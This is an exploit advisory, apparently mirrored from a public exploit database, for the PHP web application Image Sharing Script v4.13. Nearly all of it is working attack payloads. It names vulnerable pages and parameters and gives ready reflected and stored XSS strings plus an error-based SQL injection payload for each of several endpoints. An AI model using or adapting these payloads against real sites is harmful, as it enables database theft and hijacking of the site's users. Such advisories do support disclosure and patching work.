扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 |
Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability Author : Hasan Emre Ozer Google Dork :- Date : 16/01/2017 Type : webapps Platform: PHP Vendor Homepage : http://itechscripts.com/image-sharing-script/ Sofware Price and Demo : $1250 http://photo-sharing.itechscripts.com/ -------------------------------- Type: Reflected XSS Vulnerable URL: http://localhost/[PATH]/searchpin.php Vulnerable Parameters : q= Payload:"><img src=i onerror=prompt(1)> ------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php Vulnerable Parameters: pid Method: GET Payload: ' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH ------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/categorypage.php Vulnerable Parameters: token Method: GET Payload: ' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH -------------------------------- Type: Reflected XSS Vulnerable URL: http://localhost/[PATH]/categorypage.php Vulnerable Parameters : token Payload:"><img src=i onerror=prompt(1)> ------------------------------- Type: Stored XSS Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php Method: POST Vulnerable Parameters : &text= Payload:<img src=i onerror=prompt(1)> -------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php Vulnerable Parameters: id Method: POST Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH --------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php Vulnerable Parameters: brdId Method: POST Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH |
体验盒子
